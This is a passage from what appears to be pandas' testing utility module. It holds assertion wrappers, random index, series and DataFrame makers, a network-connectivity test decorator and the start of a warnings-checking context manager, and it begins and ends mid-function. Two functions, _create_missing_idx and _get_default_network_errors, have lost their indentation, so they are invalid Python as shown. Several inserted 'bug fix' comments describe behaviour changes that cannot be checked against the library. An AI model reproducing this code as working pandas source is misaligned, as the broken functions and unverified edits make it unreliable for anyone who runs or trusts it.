                check_datetimelike_compat=check_datetimelike_compat,
                check_categorical=check_categorical,
                obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
            )
def assert_equal(left, right, **kwargs):
    """
    Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.

    Parameters
    ----------
    left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
    right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
    **kwargs
    """
    __tracebackhide__ = True
    # Plain strings compare directly (no kwargs are meaningful); a str is
    # never an instance of the array-like types below, so checking it first
    # is equivalent to the end of the chain.
    if isinstance(left, str):
        assert kwargs == {}
        return left == right
    if isinstance(left, pd.Index):
        assert_index_equal(left, right, **kwargs)
    elif isinstance(left, pd.Series):
        assert_series_equal(left, right, **kwargs)
    elif isinstance(left, pd.DataFrame):
        assert_frame_equal(left, right, **kwargs)
    elif isinstance(left, IntervalArray):
        assert_interval_array_equal(left, right, **kwargs)
    elif isinstance(left, PeriodArray):
        assert_period_array_equal(left, right, **kwargs)
    elif isinstance(left, DatetimeArray):
        assert_datetime_array_equal(left, right, **kwargs)
    elif isinstance(left, TimedeltaArray):
        assert_timedelta_array_equal(left, right, **kwargs)
    elif isinstance(left, ExtensionArray):
        assert_extension_array_equal(left, right, **kwargs)
    elif isinstance(left, np.ndarray):
        assert_numpy_array_equal(left, right, **kwargs)
    else:
        raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
    """
    Helper function to wrap the expected output of a test in a given box_class.

    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}

    Returns
    -------
    subclass of box_cls
    """
    if box_cls is pd.Index:
        return pd.Index(expected)
    if box_cls is pd.Series:
        return pd.Series(expected)
    if box_cls is pd.DataFrame:
        frame = pd.Series(expected).to_frame()
        if transpose:
            # for vector operations, we we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length.
            frame = frame.T
        return frame
    if box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        return period_array(expected)
    if box_cls is DatetimeArray:
        return DatetimeArray(expected)
    if box_cls is TimedeltaArray:
        return TimedeltaArray(expected)
    if box_cls is np.ndarray:
        return np.array(expected)
    if box_cls is to_array:
        return to_array(expected)
    raise NotImplementedError(box_cls)
def to_array(obj):
    """Box *obj* into its matching extension array, falling back to ndarray."""
    # temporary implementation until we get pd.array in place
    if is_period_dtype(obj):
        return period_array(obj)
    if is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
        return DatetimeArray._from_sequence(obj)
    if is_timedelta64_dtype(obj):
        return TimedeltaArray._from_sequence(obj)
    return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
    left,
    right,
    check_dtype=True,
    check_kind=True,
    check_fill_value=True,
    consolidate_block_indices=False,
):
    """Check that the left and right SparseArray are equal.
    Parameters
    ----------
    left : SparseArray
    right : SparseArray
    check_dtype : bool, default True
        Whether to check the data dtype is identical.
    check_kind : bool, default True
        Whether to just the kind of the sparse index for each column.
    check_fill_value : bool, default True
        Whether to check that left.fill_value matches right.fill_value
    consolidate_block_indices : bool, default False
        Whether to consolidate contiguous blocks for sparse arrays with
        a BlockIndex. Some operations, e.g. concat, will end up with
        block indices that could be consolidated. Setting this to true will
        create a new BlockIndex for that array, with consolidated
        block indices.
    """
    _check_isinstance(left, right, pd.SparseArray)
    # Compare the stored (non-fill) values first.
    assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
    # SparseIndex comparison
    assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
    assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
    if not check_kind:
        # Normalize both to BlockIndex so int/block kinds can be compared
        # structurally.
        left_index = left.sp_index.to_block_index()
        right_index = right.sp_index.to_block_index()
    else:
        left_index = left.sp_index
        right_index = right.sp_index
    if consolidate_block_indices and left.kind == "block":
        # we'll probably remove this hack...
        left_index = left_index.to_int_index().to_block_index()
        right_index = right_index.to_int_index().to_block_index()
    if not left_index.equals(right_index):
        raise_assert_detail(
            "SparseArray.index", "index are not equal", left_index, right_index
        )
    else:
        # Just ensure a
        pass
    if check_fill_value:
        assert_attr_equal("fill_value", left, right)
    if check_dtype:
        assert_attr_equal("dtype", left, right)
    # Dense materializations must agree too (covers the fill positions).
    assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
    """Assert that every element of *iterable* is contained in *dic*
    (membership via ``in``, so dict keys, set members, etc.)."""
    for k in iterable:
        # Bug fix: {key!r} already adds quotes for strings, so the previous
        # literal quotes around it produced doubled quoting like ''x''.
        assert k in dic, "Did not contain item: {key!r}".format(key=k)
def assert_copy(iter1, iter2, **eql_kwargs):
    """
    Check that paired elements from two iterables compare almost-equal
    while being distinct objects.

    iter1, iter2 : iterables producing elements comparable with
        assert_almost_equal. Top-level identity only is checked; items
        nested inside sequences that share identity are not detected.
    """
    for left, right in zip(iter1, iter2):
        assert_almost_equal(left, right, **eql_kwargs)
        msg = (
            "Expected object {obj1!r} and object {obj2!r} to be "
            "different objects, but they were the same object."
        ).format(obj1=type(left), obj2=type(right))
        assert left is not right, msg
def getCols(k):
    """Return the first *k* uppercase ASCII letters as one string."""
    letters = string.ascii_uppercase
    return letters[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Return an Index of *k* random 10-character byte-strings."""
    values = rands_array(nchars=10, size=k)
    return Index(values, name=name)
def makeUnicodeIndex(k=10, name=None):
    """Return an Index of *k* random 10-character unicode strings."""
    values = randu_array(nchars=10, size=k)
    return Index(values, name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """Return a length-*k* CategoricalIndex drawn from *n* random categories."""
    categories = rands_array(nchars=4, size=n)
    codes = np.arange(k) % n
    cat = Categorical.from_codes(codes, categories=categories)
    return CategoricalIndex(cat, name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
    """Return an IntervalIndex of *k* evenly spaced intervals over [0, 100]."""
    breaks = np.linspace(0, 100, num=k + 1)
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Return an Index of *k* booleans: [], [True], or [False, True, False, ...].

    Parameters
    ----------
    k : int, default 10
        Desired index length. Previously k <= 0 fell through to the general
        case and returned a length-2 index; now it returns an empty index.
    name : object, optional
        Name for the resulting Index.
    """
    if k <= 0:
        # bug fix: [False] * (k - 2) is empty for k < 2, so the generic
        # branch returned length 2 for k == 0 instead of an empty index
        return Index([], dtype=object, name=name)
    if k == 1:
        return Index([True], name=name)
    elif k == 2:
        return Index([False, True], name=name)
    return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
    """Return an Index holding the integers 0 .. k-1."""
    values = list(range(k))
    return Index(values, name=name)
def makeUIntIndex(k=10, name=None):
    """Return an Index of *k* integers just above the int64 range (2**63 ...)."""
    values = [2 ** 63 + offset for offset in range(k)]
    return Index(values, name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """Return a RangeIndex covering 0 .. k-1 with step 1."""
    return RangeIndex(start=0, stop=k, step=1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Return an Index of *k* random floats (sorted base values, random scale)."""
    base = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    scale = 10 ** np.random.randint(0, 9)
    return Index(base * scale, name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
    """Return a DatetimeIndex of *k* periods starting 2000-01-01 at *freq*."""
    start = datetime(2000, 1, 1)
    dates = bdate_range(start, periods=k, freq=freq, name=name)
    return DatetimeIndex(dates, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
    """Return a TimedeltaIndex of *k* periods starting at 1 day."""
    tdi = pd.timedelta_range(
        start="1 day", periods=k, freq=freq, name=name, **kwargs
    )
    return tdi
def makePeriodIndex(k=10, name=None, **kwargs):
    """Return a PeriodIndex of *k* business-day periods starting 2000-01-01."""
    start = datetime(2000, 1, 1)
    return pd.period_range(start=start, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    """Return a fixed 4-element MultiIndex (note: the *k* argument is ignored)."""
    levels = (("foo", "bar"), (1, 2))
    return MultiIndex.from_product(levels, names=names, **kwargs)
# Pool of first names used for the random "name" column in _make_timeseries.
_names = [
    "Alice",
    "Bob",
    "Charlie",
    "Dan",
    "Edith",
    "Frank",
    "George",
    "Hannah",
    "Ingrid",
    "Jerry",
    "Kevin",
    "Laura",
    "Michael",
    "Norbert",
    "Oliver",
    "Patricia",
    "Quinn",
    "Ray",
    "Sarah",
    "Tim",
    "Ursula",
    "Victor",
    "Wendy",
    "Xavier",
    "Yvonne",
    "Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
    """
    Make a DataFrame with a DatetimeIndex named "timestamp".

    Parameters
    ----------
    start : str or Timestamp, default "2000-01-01"
        The start of the index. Passed to date_range with `freq`.
    end : str or Timestamp, default "2000-12-31"
        The end of the index. Passed to date_range with `freq`.
    freq : str or Freq
        The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.

    Columns produced:
    * name : object dtype with string names
    * id : int dtype
    * x, y : float dtype

    Examples
    --------
    >>> _make_timeseries()
                  id    name         x         y
    timestamp
    2000-01-01   982   Frank  0.031261  0.986727
    2000-01-02  1025   Edith -0.086358 -0.032920
    ...
    """
    index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
    n = len(index)
    rng = np.random.RandomState(seed)
    # NOTE: draw order (name, id, x, y) is fixed so results are reproducible
    data = {
        "name": rng.choice(_names, size=n),
        "id": rng.poisson(1000, size=n),
        "x": rng.rand(n) * 2 - 1,
        "y": rng.rand(n) * 2 - 1,
    }
    frame = pd.DataFrame(data, index=index, columns=sorted(data))
    # date_range is end-inclusive; drop the final row so `end` is exclusive
    if frame.index[-1] == end:
        frame = frame.iloc[:-1]
    return frame
def all_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the various
    index classes.

    Parameters
    ----------
    k: length of each of the index instances
    """
    makers = (
        makeIntIndex,
        makeFloatIndex,
        makeStringIndex,
        makeUnicodeIndex,
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeBoolIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
    )
    for maker in makers:
        yield maker(k=k)
def index_subclass_makers_generator():
    """Yield the maker function for each Index subclass (not instances)."""
    yield from (
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
        makeMultiIndex,
    )
def all_timeseries_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the classes
    which represent time-series.

    Parameters
    ----------
    k: length of each of the index instances
    """
    for maker in (makeDateIndex, makePeriodIndex, makeTimedeltaIndex):
        yield maker(k=k)
# make series
def makeFloatSeries(name=None):
    """Return a Series of N random floats indexed by random strings."""
    idx = makeStringIndex(N)
    return Series(randn(N), index=idx, name=name)
def makeStringSeries(name=None):
    """Return a Series of N random floats over a random-string index."""
    idx = makeStringIndex(N)
    return Series(randn(N), index=idx, name=name)
def makeObjectSeries(name=None):
    """Return a Series of object dtype whose values are random strings."""
    # values first, then the index, to keep the RNG draw order stable
    values = Index(makeStringIndex(N), dtype=object)
    idx = makeStringIndex(N)
    return Series(values, index=idx, name=name)
def getSeriesData():
    """Return a dict of K float Series (keyed A, B, ...) sharing one index."""
    idx = makeStringIndex(N)
    return {col: Series(randn(N), index=idx) for col in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    """Return a Series of random floats over a DatetimeIndex of *nper* periods."""
    if nper is None:
        nper = N
    idx = makeDateIndex(nper, freq=freq)
    return Series(randn(nper), index=idx, name=name)
def makePeriodSeries(nper=None, name=None):
    """Return a Series of random floats over a PeriodIndex of *nper* periods."""
    if nper is None:
        nper = N
    idx = makePeriodIndex(nper)
    return Series(randn(nper), index=idx, name=name)
def getTimeSeriesData(nper=None, freq="B"):
    """Return a dict of K random time series keyed by column letter."""
    return {col: makeTimeSeries(nper, freq) for col in getCols(K)}
def getPeriodData(nper=None):
    """Return a dict of K random period-indexed series keyed by column letter."""
    return {col: makePeriodSeries(nper) for col in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    """Return a DataFrame of K random float columns over a DatetimeIndex."""
    return DataFrame(getTimeSeriesData(nper, freq))
def makeDataFrame():
    """Return a DataFrame of K random float columns over a string index."""
    return DataFrame(getSeriesData())
def getMixedTypeDict():
    """Return (index, data) for a 5-row frame with float/str/datetime columns."""
    idx = Index(["a", "b", "c", "d", "e"])
    data = {
        "A": [0.0, 1.0, 2.0, 3.0, 4.0],
        "B": [0.0, 1.0, 0.0, 1.0, 0.0],
        "C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
        "D": bdate_range("1/1/2009", periods=5),
    }
    return idx, data
def makeMixedDataFrame():
    """Return the mixed-dtype DataFrame built from getMixedTypeDict's data."""
    _, data = getMixedTypeDict()
    return DataFrame(data)
def makePeriodFrame(nper=None):
    """Return a DataFrame of K random float columns over a PeriodIndex."""
    return DataFrame(getPeriodData(nper))
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """Create an index/multindex with given dimensions, levels, names, etc'

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
       names, if false will use no names, if a list is given, the name of
       each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
       label will repeated at the corresponding level, you can specify just
       the first few, the rest will use the default ndupe_l of 1.
       len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
       If idx_type is not None, `idx_nlevels` must be 1.
       "i"/"f" creates an integer/float index,
       "s"/"u" creates a string/unicode index
       "dt" create a datetime index.
       "td" create a timedelta index.
       if unspecified, string labels will be generated.
    """
    import re

    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) is nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )

    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None

    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]

    # specific 1D index type requested?
    idx_func = dict(
        i=makeIntIndex,
        f=makeFloatIndex,
        s=makeStringIndex,
        u=makeUnicodeIndex,
        dt=makeDateIndex,
        td=makeTimedeltaIndex,
        p=makePeriodIndex,
    ).get(idx_type)
    if idx_func:
        idx = idx_func(nentries)
        # but we need to fill in the name
        if names:
            idx.name = names[0]
        return idx
    elif idx_type is not None:
        raise ValueError(
            '"{idx_type}" is not a legal value for `idx_type`, '
            'use "i"/"f"/"s"/"u"/"dt/"p"/"td".'.format(idx_type=idx_type)
        )

    # pad ndupe_l with the default multiplicity of 1 up to nlevels
    if len(ndupe_l) < nlevels:
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)

    def keyfunc(x):
        # sort labels by their numeric (prefix-stripped) level/group parts
        numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
        return [int(num) for num in numeric_tuple]

    tuples = []
    for i in range(nlevels):
        # build a list of lists to create the index from
        div_factor = nentries // ndupe_l[i] + 1
        cnt = Counter()
        for j in range(div_factor):
            label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
            cnt[label] = ndupe_l[i]
        # cute Counter trick: elements() repeats each label ndupe_l[i] times
        result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
        tuples.append(result)

    tuples = list(zip(*tuples))

    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        # bug fix: names is None when names=False (the default), so
        # names[0] used to raise TypeError here
        name = None if names is None else names[0]
        index = Index(tuples[0], name=name)
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Create a DataFrame using supplied parameters.

    nrows, ncols - number of data rows/cols
    c_idx_names, idx_names  - False/True/list of strings,  yields No names ,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
        at that position, the default generator used yields values of the form
        "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
        of duplicates for each label at a given level of the corresponding
        index. The default `None` value produces a multiplicity of 1 across
        all levels, i.e. a unique index. Will accept a partial list of length
        N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
        nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
        have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" create a datetime index.
        "td" create a timedelta index.
        if unspecified, string labels will be generated.

    Examples:
    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)
    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")
    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FI","FO","FAM"],
                             c_idx_nlevels=2)
    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    # a typed (non-string) index only makes sense for a single level
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )
    # column labels are prefixed "C", row labels "R" (see makeCustomIndex)
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )
    # by default, generate data based on location
    if data_gen_f is None:
        data_gen_f = lambda r, c: "R{rows}C{cols}".format(rows=r, cols=c)
    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
    nrows,
    ncols,
    density=0.9,
    random_state=None,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
    Build a custom DataFrame and punch (1 - density) of its cells to NaN.

    Parameters
    ----------
    density : float, optional
        Float in (0, 1) that gives the percentage of non-missing numbers in
        the DataFrame.
    random_state : {np.random.RandomState, int}, optional
        Random number generator or random seed.

    See makeCustomDataframe for descriptions of the rest of the parameters.
    """
    frame_kwargs = dict(
        c_idx_names=c_idx_names,
        r_idx_names=r_idx_names,
        c_idx_nlevels=c_idx_nlevels,
        r_idx_nlevels=r_idx_nlevels,
        data_gen_f=data_gen_f,
        c_ndupe_l=c_ndupe_l,
        r_ndupe_l=r_ndupe_l,
        dtype=dtype,
        c_idx_type=c_idx_type,
        r_idx_type=r_idx_type,
    )
    df = makeCustomDataframe(nrows, ncols, **frame_kwargs)
    rows, cols = _create_missing_idx(nrows, ncols, density, random_state)
    df.values[rows, cols] = np.nan
    return df
def makeMissingDataframe(density=0.9, random_state=None):
    """Return makeDataFrame() output with (1 - density) of cells set to NaN."""
    df = makeDataFrame()
    rows, cols = _create_missing_idx(
        *df.shape, density=density, random_state=random_state
    )
    df.values[rows, cols] = np.nan
    return df
class TestSubDict(dict):
    """Trivial dict subclass used to check that dict subclasses round-trip."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
def optional_args(decorator):
    """allows a decorator to take optional positional and keyword arguments.
    Assumes that taking a single, callable, positional argument means that
    it is decorating a function, i.e. something like this::

        @my_decorator
        def function(): pass

    Calls decorator with decorator(f, *args, **kwargs)"""

    @wraps(decorator)
    def wrapper(*args, **kwargs):
        def dec(f):
            return decorator(f, *args, **kwargs)

        # bare usage: a single positional callable and no keyword args
        if not kwargs and len(args) == 1 and callable(args[0]):
            func = args[0]
            args = []
            return dec(func)
        return dec

    return wrapper
# skip tests on exceptions with this message
# Substrings of exception text that mark a failure as network-related; a
# test whose error message contains any of these is skipped, not failed.
_network_error_messages = (
    # 'urlopen error timed out',
    # 'timeout: timed out',
    # 'socket.timeout: timed out',
    "timed out",
    "Server Hangup",
    "HTTP Error 503: Service Unavailable",
    "502: Proxy Error",
    "HTTP Error 502: internal error",
    "HTTP Error 502",
    "HTTP Error 503",
    "HTTP Error 403",
    "HTTP Error 400",
    "Temporary failure in name resolution",
    "Name or service not known",
    "Connection refused",
    "certificate verify",
)
# or this e.errno/e.reason.errno
# errno values treated as transient network failures (skip, don't fail)
_network_errno_vals = (
    101,  # Network is unreachable
    111,  # Connection refused
    110,  # Connection timed out
    104,  # Connection reset Error
    54,  # Connection reset by peer
    60,  # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
    """Try to connect to the given url. True if succeeds, False if IOError
    raised

    Parameters
    ----------
    url : basestring
        The URL to try to connect to
    error_classes : tuple of Exception, optional
        Exception types that indicate "not connectable"; defaults to the
        standard network errors.

    Returns
    -------
    connectable : bool
        Return True if no IOError (unable to connect) or URLError (bad url) was
        raised
    """
    if error_classes is None:
        error_classes = _get_default_network_errors()

    try:
        with urlopen(url):
            pass
    except error_classes:
        return False
    return True
@optional_args
def network(
    t,
    url="http://www.google.com",
    raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
    check_before_test=False,
    error_classes=None,
    skip_errnos=_network_errno_vals,
    _skip_on_messages=_network_error_messages,
):
    """
    Label a test as requiring network connection and, if an error is
    encountered, only raise if it does not find a network connection.

    In comparison to ``network``, this assumes an added contract to your test:
    you must assert that, under normal conditions, your test will ONLY fail if
    it does not have network connectivity.

    You can call this in 3 ways: as a standard decorator, with keyword
    arguments, or with a positional argument that is the url to check.

    Parameters
    ----------
    t : callable
        The test requiring network connectivity.
    url : path
        The url to test via ``pandas.io.common.urlopen`` to check
        for connectivity. Defaults to 'http://www.google.com'.
    raise_on_error : bool
        If True, never catches errors.
    check_before_test : bool
        If True, checks connectivity before running the test case.
    error_classes : tuple or Exception
        error classes to ignore. If not in ``error_classes``, raises the error.
        defaults to IOError. Be careful about changing the error classes here.
    skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
        of these values will be skipped with an appropriate
        message.
    _skip_on_messages: iterable of string
        any exception e for which one of the strings is
        a substring of str(e) will be skipped with an appropriate
        message. Intended to suppress errors where an errno isn't available.

    Notes
    -----
    * ``raise_on_error`` supersedes ``check_before_test``

    Returns
    -------
    t : callable
        The decorated test ``t``, with checks for connectivity errors.

    Example
    -------

    Tests decorated with @network will fail if it's possible to make a network
    connection to another URL (defaults to google.com)::

      >>> from pandas.util.testing import network
      >>> from pandas.io.common import urlopen
      >>> @network
      ... def test_network():
      ...     with urlopen("rabbit://bonanza.com"):
      ...         pass
      Traceback
         ...
      URLError: <urlopen error unknown url type: rabit>

      You can specify alternative URLs::

        >>> @network("http://www.yahoo.com")
        ... def test_something_with_yahoo():
        ...    raise IOError("Failure Message")
        >>> test_something_with_yahoo()
        Traceback (most recent call last):
            ...
        IOError: Failure Message

      If you set check_before_test, it will check the url first and not run the
      test on failure::

        >>> @network("failing://url.blaher", check_before_test=True)
        ... def test_something():
        ...     print("I ran!")
        ...     raise ValueError("Failure")
        >>> test_something()
        Traceback (most recent call last):
            ...

    Errors not related to networking will always be raised.
    """
    from pytest import skip

    if error_classes is None:
        error_classes = _get_default_network_errors()

    t.network = True

    @wraps(t)
    def wrapper(*args, **kwargs):
        if check_before_test and not raise_on_error:
            if not can_connect(url, error_classes):
                skip()
        try:
            return t(*args, **kwargs)
        except Exception as err:
            errno = getattr(err, "errno", None)
            # bug fix: previously this tested hasattr(errno, "reason"),
            # which is always False (errno is None or an int), so the
            # errno wrapped inside URLError.reason was never unwrapped
            if not errno and hasattr(err, "reason"):
                errno = getattr(err.reason, "errno", None)

            if errno in skip_errnos:
                skip(
                    "Skipping test due to known errno"
                    " and error {error}".format(error=err)
                )

            e_str = str(err)

            if any(m.lower() in e_str.lower() for m in _skip_on_messages):
                skip(
                    "Skipping test because exception "
                    "message is known and error {error}".format(error=err)
                )

            if not isinstance(err, error_classes):
                raise

            if raise_on_error or can_connect(url, error_classes):
                raise
            else:
                skip(
                    "Skipping test due to lack of connectivity"
                    " and error {error}".format(error=err)
                )

    return wrapper
# Backwards-compatible alias for the ``network`` decorator.
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
    expected_warning=Warning,
    filter_level="always",
    clear=None,
    check_stacklevel=True,
    raise_on_extra_warnings=True,
):
    """
    Context manager for running code expected to either raise a specific
    warning, or not raise any warnings. Verifies that the code raises the
    expected warning, and that it does not raise any other unexpected
    warnings. It is basically a wrapper around ``warnings.catch_warnings``.

    Parameters
    ----------
    expected_warning : {Warning, False, None}, default Warning
        The type of Exception raised. ``exception.Warning`` is the base
        class for all warnings. To check that no warning is returned,
        specify ``False`` or ``None``.
    filter_level : str or None, default "always"
        Specifies whether warnings are ignored, displayed, or turned
        into errors.
        Valid values are:

        * "error" - turns matching warnings into exceptions
        * "ignore" - discard the warning
        * "always" - always emit a warning
        * "default" - print the warning the first time it is generated
          from each location
        * "module" - print the warning the first time it is generated
          from each module
        * "once" - print the warning the first time it is generated

    clear : str, default None
        If not ``None`` then remove any previously raised warnings from
        the ``__warningsregistry__`` to ensure that no warning messages are
        suppressed by this context manager. If ``None`` is specified,
        the ``__warningsregistry__`` keeps track of which warnings have been
        shown, and does not show them again.
    check_stacklevel : bool, default True
        If True, displays the line that called the function containing
        the warning to show were the function is called. Otherwise, the
        line that implements the function is displayed.
    raise_on_extra_warnings : bool, default True
        Whether extra warnings not of the type `expected_warning` should
        cause the test to fail.

    Examples
    --------
    >>> import warnings
    >>> with assert_produces_warning():
    ...     warnings.warn(UserWarning())
    ...
    >>> with assert_produces_warning(False):
    ...     warnings.warn(RuntimeWarning())
    ...
    Traceback (most recent call last):
        ...
    AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
    >>> with assert_produces_warning(UserWarning):
    ...     warnings.warn(RuntimeWarning())
    Traceback (most recent call last):
        ...
    AssertionError: Did not see expected warning of class 'UserWarning'.

    ..warn:: This is *not* thread-safe.
    """
    __tracebackhide__ = True
    with warnings.catch_warnings(record=True) as w:
        if clear is not None:
            # make sure that we are clearing these warnings
            # if they have happened before
            # to guarantee that we will catch them
            if not is_list_like(clear):
                clear = [clear]
            for m in clear:
                try:
                    m.__warningregistry__.clear()
                except AttributeError:
                    # module may not have __warningregistry__
                    pass
        saw_warning = False
        warnings.simplefilter(filter_level)
        yield w
        # after the managed block ran, classify every recorded warning as
        # either the expected one or an "extra" warning
        extra_warnings = []
        for actual_warning in w:
            if expected_warning and issubclass(
                actual_warning.category, expected_warning
            ):
                saw_warning = True
                if check_stacklevel and issubclass(
                    actual_warning.category, (FutureWarning, DeprecationWarning)
                ):
                    from inspect import getframeinfo, stack

                    # stack()[2]: the caller of this context manager; the
